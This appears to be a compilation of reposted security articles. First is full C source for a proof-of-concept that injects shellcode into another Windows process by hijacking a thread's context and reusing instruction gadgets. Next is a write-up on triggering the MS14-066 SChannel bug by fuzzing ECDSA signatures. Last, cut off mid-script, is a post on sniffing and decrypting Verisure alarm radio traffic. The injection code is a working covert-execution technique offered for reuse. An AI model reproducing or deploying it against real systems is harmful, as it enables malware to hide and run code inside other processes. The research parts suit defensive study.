"inject.h" ULONG FindPattern(LPVOID Memory,SIZE_T MemorySize,LPVOID Pattern,SIZE_T PatternSize) { for(SIZE_T x = 0; (x + PatternSize) < MemorySize; x++) { if(memcmp(&((LPBYTE)Memory)[x],Pattern,PatternSize) == 0) { return x; } } return 0xFFFFFFFF; } NTSTATUS GetTIDFromPID(IN DWORD PID,OUT PDWORD TID) { NTSTATUS NtStatus; LPVOID Buffer; ULONG Size; PSYSTEM_PROCESS_INFORMATION ProcessInfo; ULONG NextEntryOffset; Size = 0x10000; Buffer = HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Size); while(TRUE) { NtStatus = NtQuerySystemInformation(SystemProcessInformation,Buffer,Size,&Size); if(NT_SUCCESS(NtStatus)) { break; } else if(NtStatus == STATUS_INFO_LENGTH_MISMATCH) { Size += 0x10000; Buffer = HeapReAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Buffer,Size); } else { printf("NtQuerySystemInformation error: %X\n",NtStatus); goto Finish_; } } NextEntryOffset = 0; NtStatus = STATUS_NOT_FOUND; ProcessInfo = (PSYSTEM_PROCESS_INFORMATION)Buffer; do { ProcessInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)ProcessInfo + NextEntryOffset); if(ProcessInfo->ProcessId == (HANDLE)PID) { if(ProcessInfo->NumberOfThreads > 0) { *TID = (DWORD)ProcessInfo->Threads[0].ClientId.UniqueThread; NtStatus = STATUS_SUCCESS; break; } } NextEntryOffset = ProcessInfo->NextEntryOffset; }while(NextEntryOffset > 0); Finish_: HeapFree(GetProcessHeap(),0,Buffer); return NtStatus; } NTSTATUS RemoteEnumModules(IN HANDLE hProcess,OUT LPVOID** lpModules,OUT PULONG NumModules) { NTSTATUS NtStatus; PROCESS_BASIC_INFORMATION ProcBasicInfo; PPEB_LDR_DATA LdrData; PLIST_ENTRY ListHeadPtr; PLIST_ENTRY ListEntryPtr; LDR_DATA_TABLE_ENTRY ModuleEntry; LPVOID* ModBaseAddress; ULONG NumOfModules; ULONG HpMemSize; if( (!lpModules) || (!NumModules)) { return STATUS_INVALID_PARAMETER; } NtStatus = NtQueryInformationProcess(hProcess,ProcessBasicInformation,&ProcBasicInfo,sizeof(ProcBasicInfo),NULL); if(!NT_SUCCESS(NtStatus)) { return NtStatus; } NtStatus = NtReadVirtualMemory(hProcess,&((PPEB)ProcBasicInfo.PebBaseAddress)->Ldr,&LdrData,sizeof(LdrData),NULL); if(!NT_SUCCESS(NtStatus)) { return NtStatus; } ListHeadPtr = &LdrData->InLoadOrderModuleList; NtStatus = NtReadVirtualMemory(hProcess,&LdrData->InLoadOrderModuleList.Flink,&ListEntryPtr,sizeof(ListEntryPtr),NULL); if(!NT_SUCCESS(NtStatus)) { return NtStatus; } NumOfModules = 0; HpMemSize = sizeof(LPVOID) * 100; ModBaseAddress = (LPVOID*)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,HpMemSize); NtStatus = STATUS_SUCCESS; while (ListEntryPtr != ListHeadPtr) { NtStatus = NtReadVirtualMemory(hProcess,ListEntryPtr,&ModuleEntry,sizeof(ModuleEntry),NULL); if(!NT_SUCCESS(NtStatus)) { HeapFree(GetProcessHeap(),0,ModBaseAddress); return NtStatus; } if(ModuleEntry.DllBase) { if((NumOfModules + 1) * sizeof(LPVOID) >= HpMemSize) { HpMemSize += sizeof(LPVOID) * 100; ModBaseAddress = (LPVOID*)HeapReAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,ModBaseAddress,HpMemSize); } ModBaseAddress[NumOfModules] = ModuleEntry.DllBase; NumOfModules++; } ListEntryPtr = ModuleEntry.InLoadOrderLinks.Flink; } *lpModules = ModBaseAddress; *NumModules = NumOfModules; return NtStatus; } NTSTATUS GetInstructionsAddr(IN HANDLE hProcess,OUT PREMOTE_CODE_STRUCTURE pStruct,LPVOID *EsiField) { typedef struct _RM_CODE { LPBYTE Ptr; ULONG NumBytes; LPVOID* SavePtr; }RM_CODE,*PRM_CODE; NTSTATUS NtStatus; HANDLE hCurrentProcess; LPVOID* ModulesArr; ULONG NumModules; BYTE ModuleHeaders[0x800]; RM_CODE RMCodes[] = { {(LPBYTE)RmCode0,sizeof(RmCode0),&pStruct->RetRmCode0}, {(LPBYTE)RmCode1,sizeof(RmCode1),&pStruct->RetRmCode1}, {(LPBYTE)RmCodeEsi,sizeof(RmCodeEsi),EsiField}, {(LPBYTE)RmCode2,sizeof(RmCode2),&pStruct->RetRmCode2}, {(LPBYTE)RmCode3,sizeof(RmCode3),&pStruct->RetRmCode3}, {(LPBYTE)RmCodeEsi2,sizeof(RmCodeEsi2),&pStruct->PopEsi}, {(LPBYTE)RMCodeEcx,sizeof(RMCodeEcx),&pStruct->PopEcx}}; if(!pStruct) { return STATUS_INVALID_PARAMETER; } NtStatus = RemoteEnumModules(hProcess,&ModulesArr,&NumModules); if(!NT_SUCCESS(NtStatus)) { return NtStatus; } hCurrentProcess = GetCurrentProcess(); for(LONG c = 0; c < sizeof(RMCodes) / sizeof(RMCodes[0]); c++) { NTSTATUS RMCodeFound; RMCodeFound = STATUS_NOT_FOUND; for(ULONG m = 0; m < NumModules; m++) { NtStatus = NtReadVirtualMemory( hProcess, ModulesArr[m], ModuleHeaders, sizeof(ModuleHeaders), NULL); if(!NT_SUCCESS(NtStatus)) { continue; } PIMAGE_DOS_HEADER DOSHeader; PIMAGE_NT_HEADERS NTHeader; PIMAGE_SECTION_HEADER SectionHeader; LPVOID PESectionBaseAddress; LPVOID PESection; ULONG PESectionSize; MEMORY_BASIC_INFORMATION MemBasicInfo; ULONG PatternOff; DOSHeader = (PIMAGE_DOS_HEADER)ModuleHeaders; NTHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)DOSHeader + DOSHeader->e_lfanew); SectionHeader = IMAGE_FIRST_SECTION(NTHeader); if((DOSHeader->e_magic == IMAGE_DOS_SIGNATURE) && (NTHeader->Signature == IMAGE_NT_SIGNATURE) && (NTHeader->OptionalHeader.SizeOfHeaders <= sizeof(ModuleHeaders))) { for(ULONG s = 0; s < NTHeader->FileHeader.NumberOfSections; s++) { PESection = NULL; PESectionSize = SectionHeader[s].Misc.VirtualSize; PESectionBaseAddress = PTR_ADD_OFFSET(ModulesArr[m],SectionHeader[s].VirtualAddress); NtStatus = NtQueryVirtualMemory( hProcess, PESectionBaseAddress, MemoryBasicInformation, &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION), NULL); if(!NT_SUCCESS(NtStatus)) { continue; } if(!(MemBasicInfo.Protect & PAGE_EXECUTE_READ)) { continue; } NtStatus = NtAllocateVirtualMemory( hCurrentProcess, &PESection, 0, &PESectionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if(!NT_SUCCESS(NtStatus)) { continue; } /* Read section */ NtStatus = NtReadVirtualMemory( hProcess, PESectionBaseAddress, PESection, PESectionSize, NULL); if(!NT_SUCCESS(NtStatus)) { goto fmem; } PatternOff = FindPattern( PESection, PESectionSize, RMCodes[c].Ptr, RMCodes[c].NumBytes); if(PatternOff != 0xFFFFFFFF) { NtFreeVirtualMemory( hCurrentProcess, &PESection, &PESectionSize, MEM_RELEASE); *RMCodes[c].SavePtr = PTR_ADD_OFFSET(PESectionBaseAddress,PatternOff); RMCodeFound = STATUS_SUCCESS; goto val_result; } fmem: NtFreeVirtualMemory( hCurrentProcess, &PESection, &PESectionSize, MEM_RELEASE); } } } val_result: if(!NT_SUCCESS(RMCodeFound)) { NtStatus = RMCodeFound; break; } } HeapFree(GetProcessHeap(),0,ModulesArr); return NtStatus; } hSection: Pointer to a variable that receives a handle of the shared section BaseOfView: Pointer to a variable that receives a pointer to the base address of map view SizeOfView: Pointer to a variable that receives the size of view in bytes RemoteAddrOfBeginMark: Pointer to a variable that receives the address of the beginning of the mark in the remote process If the function succeeds, the return value is STATUS_SUCCESS otherwise any NTSTATUS value ------------------------------------------------------------------------------------------------------ This loop walk on the array of names of shared sections, attempts to map the section, check the size page in order to know if there is enough space to write our bytes then looks for a sequence of bytes that have been written in the section in order to know if that section is mapped into the process (alternatively you can list handles of the target process and look for any shared sections) . In other words this function validates the environment of the target process so we can know if possible to continue with our */ NTSTATUS GetSharedSection(HANDLE hTargetProcess,OUT HANDLE* hSection,OUT LPVOID* BaseOfView,OUT PULONG SizeOfView,OUT LPVOID* RemoteAddrOfBeginMark) { NTSTATUS NtStatus; HANDLE hCurrentProcess; LPVOID AllocatedBuffer; ULONG AllocatedSize; UNICODE_STRING SectionName; OBJECT_ATTRIBUTES ObjAttr; HANDLE SectionHandle; LPVOID BaseAddress; ULONG Size; MEMORY_BASIC_INFORMATION MemBasicInfo; LPVOID QueryBaseAddress; LPVOID BeginMark; ULONG BeginMarkOff; if( (!hSection) || (!BaseOfView) || (!SizeOfView) || (!RemoteAddrOfBeginMark)) { return STATUS_INVALID_PARAMETER; } hCurrentProcess = GetCurrentProcess(); AllocatedBuffer = NULL; AllocatedSize = 0x10000; // 64KB if(!NT_SUCCESS(NtStatus = NtAllocateVirtualMemory( hCurrentProcess, &AllocatedBuffer, 0, &AllocatedSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) { return NtStatus; } for(ULONG s = 0; s < sizeof(SharedSections) / sizeof(SharedSections[0]); s++) { RtlInitUnicodeString(&SectionName,SharedSections[s]); InitializeObjectAttributes(&ObjAttr,&SectionName,0,NULL,NULL); NtStatus = NtOpenSection(&SectionHandle,SECTION_MAP_WRITE | SECTION_MAP_READ,&ObjAttr); if(NT_SUCCESS(NtStatus)) { BaseAddress = NULL; Size = 0; NtStatus = NtMapViewOfSection( SectionHandle, hCurrentProcess, &BaseAddress, 0, 0, NULL, &Size, ViewUnmap, 0, PAGE_READWRITE); if(NT_SUCCESS(NtStatus) || NtStatus == STATUS_IMAGE_NOT_AT_BASE) { NtStatus = NtQueryVirtualMemory( hCurrentProcess, BaseAddress, MemoryBasicInformation, &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION), NULL); if(NT_SUCCESS(NtStatus)) { if(sizeof(REMOTE_CODE_STRUCTURE) <= MemBasicInfo.RegionSize) { RtlCopyMemory( PTR_SUB_OFFSET(PTR_ADD_OFFSET(BaseAddress,MemBasicInfo.RegionSize),sizeof(REMOTE_CODE_STRUCTURE)), BegMark, sizeof(BegMark)); QueryBaseAddress = 0; while(NT_SUCCESS(NtQueryVirtualMemory( hTargetProcess, QueryBaseAddress, MemoryBasicInformation, &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION), NULL))) { if(MemBasicInfo.Type & MEM_MAPPED) { ULONG IndReadBytes; ULONG NumOfBytes; ULONG ReadB; IndReadBytes = 0; while(IndReadBytes < MemBasicInfo.RegionSize) { ULONG Remaining = MemBasicInfo.RegionSize - IndReadBytes; NumOfBytes = Remaining < AllocatedSize ? Remaining : AllocatedSize; if(!NT_SUCCESS(NtReadVirtualMemory( hTargetProcess, QueryBaseAddress, AllocatedBuffer, NumOfBytes, &ReadB))) { break; } BeginMarkOff = FindPattern( AllocatedBuffer, NumOfBytes, (LPVOID)BegMark, sizeof(BegMark)); if(BeginMarkOff != 0xFFFFFFFF) { BeginMark = PTR_ADD_OFFSET(PTR_ADD_OFFSET(QueryBaseAddress,IndReadBytes),BeginMarkOff); *hSection = SectionHandle; *BaseOfView = BaseAddress; *SizeOfView = Size; *RemoteAddrOfBeginMark = BeginMark; NtStatus = STATUS_SUCCESS; goto Finish_; } IndReadBytes += NumOfBytes; } } QueryBaseAddress = PTR_ADD_OFFSET(QueryBaseAddress,MemBasicInfo.RegionSize); } } } NtUnmapViewOfSection(hCurrentProcess,BaseAddress); } NtClose(SectionHandle); } } Finish_: NtFreeVirtualMemory(hCurrentProcess,&AllocatedBuffer,&AllocatedSize,MEM_RELEASE); return NtStatus; } NTSTATUS TCHInjection(IN DWORD PID) { NTSTATUS NtStatus; OBJECT_ATTRIBUTES ObjAttributes; CLIENT_ID ClientId; HANDLE hProcess; HANDLE hSection; LPVOID SectionBaseOfView; ULONG SectionSizeOfView; LPVOID RemtBeginMark; DWORD ThreadId; HANDLE hThread; ULONG SuspendCount; CONTEXT ThreadContext; REMOTE_CODE_STRUCTURE RemoteCodeStruct; LPVOID rEsi; ClientId.UniqueProcess = (PVOID)PID; ClientId.UniqueThread = NULL; InitializeObjectAttributes(&ObjAttributes,NULL,0,NULL,NULL); NtStatus = NtOpenProcess( &hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ, &ObjAttributes, &ClientId); if(!NT_SUCCESS(NtStatus)) { printf("Unable to get a handle to the target process: %X\n",NtStatus); return NtStatus; } NtStatus = GetSharedSection( hProcess, &hSection, &SectionBaseOfView, &SectionSizeOfView, &RemtBeginMark); if(!NT_SUCCESS(NtStatus)) { printf("Unable to get a valid shared section: %X\n",NtStatus); goto Finish_; } NtStatus = GetInstructionsAddr(hProcess,&RemoteCodeStruct,&rEsi); if(!NT_SUCCESS(NtStatus)) { goto Finish_chsc; } RtlCopyMemory(RemoteCodeStruct.BeginningMark,BegMark,sizeof(BegMark)); RtlCopyMemory(RemoteCodeStruct.Shellcode,Code,sizeof(Code)); RtlCopyMemory(RemoteCodeStruct.TittleMsgBox,MsgTittle,sizeof(MsgTittle)); RemoteCodeStruct.CreateThread = GetProcAddress(GetModuleHandleW(TEXT("kernel32")),"CreateThread"); RemoteCodeStruct.MessageBoxW = GetProcAddress(LoadLibraryW(TEXT("user32")),"MessageBoxW"); RemoteCodeStruct.lpAddress = NULL; RemoteCodeStruct.dwSize = sizeof(Code); RemoteCodeStruct.flAllocationType = MEM_COMMIT | MEM_RESERVE; RemoteCodeStruct.flProtect = PAGE_EXECUTE_READWRITE; RemoteCodeStruct.src = PTR_ADD_OFFSET(RemtBeginMark,FIELD_OFFSET(REMOTE_CODE_STRUCTURE,Shellcode)); RemoteCodeStruct.count = sizeof(Code); NtStatus = GetTIDFromPID(PID,&ThreadId); if(!NT_SUCCESS(NtStatus)) { goto Finish_chsc; } ClientId.UniqueProcess = NULL; ClientId.UniqueThread = (PVOID)ThreadId; InitializeObjectAttributes(&ObjAttributes,NULL,NULL,0,NULL); NtStatus = NtOpenThread( &hThread, THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME | THREAD_QUERY_INFORMATION, &ObjAttributes, &ClientId); if(!NT_SUCCESS(NtStatus)) { goto Finish_chsc; } NtStatus = NtSuspendThread(hThread,&SuspendCount); if(!NT_SUCCESS(NtStatus)) { goto Finish_chtd; } /* Resume thread as soon as possible */ RtlZeroMemory(&ThreadContext,sizeof(CONTEXT)); ThreadContext.ContextFlags = CONTEXT_CONTROL | CONTEXT_INTEGER; NtStatus = NtGetContextThread(hThread,&ThreadContext); if(!NT_SUCCESS(NtStatus)) { NtResumeThread(hThread,&SuspendCount); goto Finish_chtd; } RemoteCodeStruct.tc_Eip = ThreadContext.Eip; RemoteCodeStruct._Flags = ThreadContext.EFlags; RemoteCodeStruct._Eax = ThreadContext.Eax; RemoteCodeStruct._Ecx = ThreadContext.Ecx; RemoteCodeStruct._Edx = ThreadContext.Edx; RemoteCodeStruct._Ebx = ThreadContext.Ebx; RemoteCodeStruct._Ebp = ThreadContext.Ebp; RemoteCodeStruct._Esi = ThreadContext.Esi; RemoteCodeStruct._Edi = ThreadContext.Edi; RemoteCodeStruct._Esp = ThreadContext.Esp; RtlCopyMemory(SectionBaseOfView,&RemoteCodeStruct,sizeof(REMOTE_CODE_STRUCTURE)); ThreadContext.Ebp = (DWORD)RemtBeginMark; ThreadContext.Eip = (DWORD)GetProcAddress(GetModuleHandleW(TEXT("kernel32")),"VirtualAlloc"); ThreadContext.Esp = (DWORD)PTR_ADD_OFFSET(RemtBeginMark,FIELD_OFFSET(REMOTE_CODE_STRUCTURE,RetRmCode0)); ThreadContext.Esi = (DWORD)rEsi; ThreadContext.Edi = (DWORD)GetProcAddress(GetModuleHandleW(TEXT("ntdll")),"memcpy"); NtStatus = NtSetContextThread(hThread,&ThreadContext); if(!NT_SUCCESS(NtStatus)) { NtResumeThread(hThread,&SuspendCount); goto Finish_chtd; } NtStatus = NtResumeThread(hThread,&SuspendCount); if(!NT_SUCCESS(NtStatus)) { goto Finish_chtd; } printf("Injection successed \n"); NtStatus = STATUS_SUCCESS; Finish_chtd: NtClose(hThread); Finish_chsc: NtUnmapViewOfSection(GetCurrentProcess(),SectionBaseOfView); NtClose(hSection); Finish_: NtClose(hProcess); return NtStatus; } Sursa: KernelMode.info • View topic - PoC: Code injection via thread hijacking

Triggering MS14-066 Posted November 17, 2014 Research Team Microsoft addressed CVE-2014-6321 this Patch Tuesday, which has been hyped as the next Heartbleed. This vulnerability (actually at least 2 vulnerabilities) promises remote code execution in applications that use the SChannel Security Service Provider, such as Microsoft Internet Information Services (IIS). The details have been scarce. Lets fix that. Looking at the bindiff of schannel.dll, we see a few changed functions, several touching the DTLSCookieManager class and various others. There is at least one bug addressed in DTLSCookieManager, but that one is for a different time. The one everyone is worried about in seems to be in schannel!DecodeSigAndReverse(…). A high level view of the changes to DecodeSigAndReverse(…) are presented below. Here we can see that there is some new logic (grey blocks) added to the middle of the patched function (right side). Added branches are always a good sign. If we zoom in on the patched version, the situation looks even more promising. We can now see that the added logic controls a path to a memcpy (actually two memcpys — they wouldn’t both fit in the screenshot). This is an indication that we are looking in the right place. So how do we get here? Lets look at the paths to this function in the unpatched version of schannel.dll So, it appears as though we need to hit ‘ProcessHandshake’ and then craft a ‘ClientVerifyMessage’ in order to hit the changed code. To accomplish this, we should probably check out the TLS/SSL documentation at MSDN. Given the names of the function in the codepath, it would make sense that we are dealing with a Certificate Verify message which is involved in certificate authentication. If we take a closer look at the unpatched function, we can get a key clue from the lpszStructType parameter in the call to CryptDecodeObject. With a quick trip to MSDN, we can see that this parameter is telling us what kind of structure to expect. In this case we have X509_ECC_SIGNATURE and X509_DSS_SIGNATURE. Picking on the ECC_SIGNATURE, the expected structure is defined on MSDN It appears as though there could be an issue with the size parameter to one of the memcpys, probably related to encoding the certificate. At this point with what we know, the fastest way for us to proceed is to look at this function dynamically (with a debugger). So, we created an ECDSA signed certificate with OpenSSL and setup Microsoft IIS with certificate authentication enabled. We then attached a remote debugger to the LSASS process on the IIS box and breakpointed the ECC_SIGNATURE comparison (cmp ebx, 2F). Surprisingly the breakpoint fired when attempting to authenticate using openssl s_client on the first try! Now that we can hit the bad code, the next step is making something cool happen here. Again, to speed up analysis, we decided to modify OpenSSL to fuzz this code path. In OpenSSL, ECDSA signatures for ‘client verify messages’ are handled in the source file s3_clnt.c. The encoded signatures from the client which end up hitting the CryptDecodeObject(…) call in schannel!DecodeSigAndReverse(…) come from a function called ECDSA_sign(…). If we wander down the function ssl3_send_client_verify(…) which eventually calls ECDSA_sign(…), we get to this block which actually handles the ECDSA signing for our client verify message: To clarify this call, the function prototype for ECDSA_sign is as follows: int ECDSA_sign(int type, const unsigned char *dgst, int dgstlen, unsigned char *sig, unsigned int *siglen, EC_KEY *eckey); Reading the documentation for that function we learn that “…The DER encoded signatures is stored in sig and it’s length is returned in sig_len.” Therefore, if we were to use openssl s_client to authenticate to our IIS box and then were to single step through schannel!DecodeSigAndReverse(…), we would see the contents of ‘p’ from the above call to ECDSA_sign(…) being handed to CryptDecodeObject(…) in schannel, which would then be translated and handed off to our bad memcpy block. So, all we really need to do is to edit s3_clnt.c to randomly change one byte in ‘p’ to a random value before sending our Certificate Verify message back to IIS over and over again and wait until something cool happens. And if we wait long enough, it will – we will get a crash in memcpy. Further analysis and exploitation are left as an exercise to the reader. Sursa: Triggering MS14-066 | BeyondTrust

Reverse Engineer a Verisure Wireless Alarm part 1 – Radio Communications by foip on November 16th, 2014 1. Introduction Verisure is a supplier of wireless home alarms and connected services for the home. A Verisure setup can be composed of multiple devices, sensors and/or detectors such as Motion detectors with camera, Magnetic contacts for doors or Windows, Smoke detectors, Keypads, Sirens, etc. Each component of the setup communicates using wireless technology with the central gateway called “Vbox”, it-self monitored by Verisure agents through the Internet and/or 3G connection. As a Verisure customer, I was curious to get a clear view of the design and security measures implemented by the manufacturer. I therefore decided to buy a testing Kit on eBay (120 Euros) to open it and starting an exciting journey inside the boxes. This post is the first part of my Verisure story and aims to observe radio communications between the multiple devices of the alarm. In other words, we will translate the radio communication into binary messages. Please note that Verisure is the new name of Securitas-Direct. You may potentially find both names in my scripts and screenshots. 2. Discovering frequency and modulation We know that 433 MHz and 868 MHz are popular bands for such equipments. Starting our favorite spectrum analyzer (GQRX in this case) confirmed our thoughts by showing some strong pulses while we were pushing random keys on the keypad alarm, located next to the HackRF. In order to get a clear view of the signal, samples were recorded using hackrf_transfer tool and then opened into baudline: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24[/TD] [TD=class: code]$ hackrf_transfer -s 2000000 -f 869000000 -a 0 -r /tmp/hackrf_verisure_s2000000_f869000000_01.iq call hackrf_sample_rate_set(2000000 Hz/2.000 MHz) call hackrf_baseband_filter_bandwidth_set(1750000 Hz/1.750 MHz) call hackrf_set_freq(869000000 Hz/869.000 MHz) call hackrf_set_amp_enable(0) Stop with Ctrl-C 3.9 MiB / 1.000 sec = 3.9 MiB/second 3.9 MiB / 1.000 sec = 3.9 MiB/second 3.9 MiB / 1.000 sec = 3.9 MiB/second 4.2 MiB / 1.000 sec = 4.2 MiB/second 3.9 MiB / 1.000 sec = 3.9 MiB/second 3.9 MiB / 1.000 sec = 3.9 MiB/second 3.9 MiB / 1.000 sec = 3.9 MiB/second 4.2 MiB / 1.000 sec = 4.2 MiB/second ^CCaught signal 2 2.1 MiB / 0.540 sec = 3.9 MiB/second User cancel, exiting... Total time: 8.54128 s hackrf_stop_rx() done hackrf_close() done hackrf_exit() done fclose(fd) done exit[/TD] [/TR] [/TABLE] Nice! Zooming into the signal shows 2 spikes which means that we are probably in front of a 2-FSK modulated signal. 3. Chipsets and datasheets Before going further, it could be interesting to learn a bit more about the micro-controller used by the devices. As you will see, this information is really helpful since it gives us some clues about the potential modulation, ciphering, data encoding, etc. Opening a magnetic contact revealed a CC1110-F16 chip. Briefly, the datasheet informs us about the following capabilities of the chip: Modulation: 2-FSK, GFSK, MSK, ASK, and OOK 128-bit AES supported in hardware coprocessor (so if data looks encrypted, we probably already know which cipher suite is in use) 8051 MCU architecture (needed later for IDA Pro) Optional automatic whitening and de-whitening of data. … Additionally, we know a magical firmware called RFCat which can definitively help us to learn and play with CC1110 chips. RFCat will be largely used in the next parts of our Verisure story. For now, we will focus on GNURadio framework and the HackRF One SDR platform. 4. GNURadio at works 41. A First FFT Let’s build a simple GNURadio flowgraph using the HackRF as a source, plus an FFT Sink. To avoid DC spike in the middle of our signal, we tune the HackRF to 520KHz below the interesting frequency, and then shift back the signal using the Frequency Xlating FIR Filter block. A few GUI sliders are used to control the gain and to provide additional fine-tuning of the frequency. Great. Our supposed 2-FSK modulated signal is back. The center frequency is about 869.036 MHz. . 4.2. Signal filtering and demodulation It is time to start demodulating the signal but first, we need to remove any unwanted noise or adjacent communications. 4.2.1. Filtering Using baudline, we have observed about 38.3 KHz between the MARK and SPACE frequencies, so a deviation of about 19 KHz. In our GNURadio flowgraph, we then apply a Lowpass filter against our signal using a cutoff value of 21 KHz (so a bit more than 19 KHz) and a transition width of 15 KHz: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]firdes.low_pass(1,samp_rate, 21000, 15000)[/TD] [/TR] [/TABLE] 4.2.2. Demodulation As we are facing a potential FSK modulated signal, a new Quadrature Demod block is added to the flowgraph, which will then send the demodulated signal into a WAV file for further analyze. The new flowgraph becomes: Haaaa, by opening our WAV file using Audacity (or any other WAV file editor), the demodulated signal seems to reveal its secrets: a preamble (0101010101…) and a potential synchronization pattern. Let’s go a bit further by slicing the signal into propers 0 and 1. The Binary Slicer block aims to convert all samples above 0 to 1, and sample below 0 to 0. The block is inserted between the demodulator block and the WAV sink. Back to Audacity, this beautiful binary sequence appears… 4.3. Getting sync-word (Access Code) Getting the synchronization word is now only a matter of observing the pattern just after the preamble. Audacity helps to do this by adding a Label layer on top of the WAV signal. The difficulty here is to find the right police character which match (more or less) the flow of our signal. We observe a double SyncWord equal to 0xD391. 4.4. Getting symbol rate and samples per symbol So far so good. The next step is to discover the symbol rate and the samples per symbol needed to convert this signal into a binary sequence (done by the “Clock Recovery” block). 4.4.1. Symbol rate What is “Symbol Rate” ? By symbol, we mean 0 or 1. Thus the question to answer is “How many 0 or 1 do we observe per second?”. I know that better techniques exist to compute this value (I just need to learn them) but right now, I will simply count the number of symbols from the Audacity view: We count about 69 symbols during 0.00180 seconds, which give a symbol rate of 38333 [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11[/TD] [TD=class: code]$ echo -n "010101010101010101010101011010011100100011101001110010001111100001111" | wc -c 69 $ bc bc 1.06.95 Copyright 1991-1994, 1997, 1998, 2000, 2004, 2006 Free Software Foundation, Inc. This is free software with ABSOLUTELY NO WARRANTY. For details type `warranty'. 69 / 0.00180 38333 quit[/TD] [/TR] [/TABLE] As I said, this method is probably not the most accurate. Actually, I found a more precise value by performing the same exercise on a lager portion of the signal (but making screenshots less clear). The final symbol rate is 38450. 4.4.2. Samples per symbol The number of samples per symbol is one of the most important value needed by the Clock Recovery block. Remember that your SDR device is configured to receive or transmit signal at a specified sample rate. The number of samples per symbol is just the number of samples needed to send one symbol (0 or 1), and is simply computed like this: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]samples_per_symbol = sample_rate / symbol_rate[/TD] [/TR] [/TABLE] We now have everything we need to setup the Clock Recovery block: 4.5. Decoding packets The remaining steps to get digital messages are to recognize the frames using the syncword (done by the Correlate Access Code block) and to decode them (done by the Packet Decoder block). There are a couple of GNURadio blocks dedicated to decoding/encoding packets but since we are dealing with CC1110 devices, we had to create specific blocks able to respect the CC1110 packets format. Further information about these blocks can be found on the following blog post: GNU Radio – CC1111 packets encoder/decoder blocks. The final GNURadio flowgraph is: As you can see, the Packet Decoder (CC1111) block receives a python queue as argument (see Target Message Queue). This is where our decoded messages will be sent out. This flowgraph will actually not be executed as it. Another python script will managed its execution and will pull messages from the python queue, dissect them (as Wireshark would do against a pcap file) and print them out on the screen. Here below is the main script. #!/usr/bin/env python #============================================================= # Securitas-Direct (Verisure) RF sniffer # By Jerome Nokin (http://funoverip.net / @FUNoverip) #============================================================= # # Usage: securitas_rx.py [-k KEY] # # optional arguments: # -k,--key <KEY> Optional AES-128 Key (hexadecimal) # #============================================================= import ctypes import sys import datetime import argparse from grc.verisure_demod import verisure_demod from threading import Thread from Crypto.Cipher import AES from binascii import hexlify, unhexlify from time import sleep # Colors def pink(t): return '\033[95m' + t + '\033[0m' def blue(t): return '\033[94m' + t + '\033[0m' def yellow(t): return '\033[93m' + t + '\033[0m' def green(t): return '\033[92m' + t + '\033[0m' def red(t): return '\033[91m' + t + '\033[0m' # Thread dedicated to GNU Radio flowgraph class flowgraph_thread(Thread): def __init__(self, flowgraph): Thread.__init__(self) self.setDaemon(1) self._flowgraph = flowgraph def run(self): self._flowgraph.Run() #print "FFT Closed/Killed" # AES decryption BS = 16 pad = lambda s : s + (BS - len(s) % BS) * chr(BS - len(s) % BS) unpad = lambda s : s[0:-ord(s[-1])] def aes_decrypt(ciphertext, iv, key, padding=True): cipher = AES.new(key, AES.MODE_CBC, iv) plaintext = cipher.decrypt(ciphertext) if padding: return unpad(plaintext) else: return plaintext # Generate timestamp def get_time(): current_time = datetime.datetime.now().time() return current_time.isoformat() # Print out frames to stdout def dump_frame(frame, aes_iv = None, aes_key = None): # Dissecting frame pkt_len = hexlify(frame[0:1]) unkn1 = hexlify(frame[1:2]) seqnr = hexlify(frame[2:3]) src_id = "".join(hexlify(n) for n in frame[3:7]) dst_id = "".join(hexlify(n) for n in frame[7:11]) data = "" # Payload is a block of 16b and AES key provided ? Try to decrypt it if (ord(unhexlify(pkt_len))-2-8) % 16 == 0 and aes_iv!=None and aes_key!=None: if unkn1 == '\x04': # block is 16b without additional padding data = " ".join(hexlify(n) for n in aes_decrypt(frame[11:], aes_iv, aes_key, False)) else: # block is 16b with padding data = " ".join(hexlify(n) for n in aes_decrypt(frame[11:], aes_iv, aes_key)) if len(data) ==0: data = "<empty> Wrong EAS key ?" else: data = " ".join(hexlify(n) for n in frame[11:]) # Print out the frame print "[%s] %s %s %s %s %s %s" % (get_time(), yellow(pkt_len), blue(unkn1), seqnr, green(src_id), red(dst_id), pink(data)) # Main entry point if __name__ == '__main__': aes_iv = unhexlify("00000000000000000000000000000000") aes_key = None if sys.platform.startswith('linux'): try: x11 = ctypes.cdll.LoadLibrary('libX11.so') x11.XInitThreads() except: print "Warning: failed to XInitThreads()" # Read args parser = argparse.ArgumentParser() parser.add_argument("-k", "--key", help="Optional AES-128 Key (hex)", type=str) args = parser.parse_args() # Initializing GNU Radio flowgraph flowgraph = verisure_demod() if args.key: print "[%s] AES key provided. Decryption enabled" % get_time() aes_key = args.key aes_key = ''.join(aes_key.split()) aes_key = unhexlify(aes_key) print "[%s] AES-128 IV : %s" % (get_time(), hexlify(aes_iv)) print "[%s] AES-128 key: %s" % (get_time(), hexlify(aes_key)) # current frequency freq = 0 # Some additional output print "[%s] Starting flowgraph" % get_time() # Start flowgraph insie a new thread flowgraph_t = flowgraph_thread(flowgraph) flowgraph_t.start() # Until flowgraph thread is running (and we hope 'producing') while flowgraph_t.isAlive(): # Did we change frequency ? if freq != flowgraph.get_frequency(): print "[%s] Frequency tuned to: %0.2f KHz" % (get_time(), flowgraph.get_frequency()/1000) freq = flowgraph.get_frequency() # Emptying message queue while True: if flowgraph.myqueue.count() <= 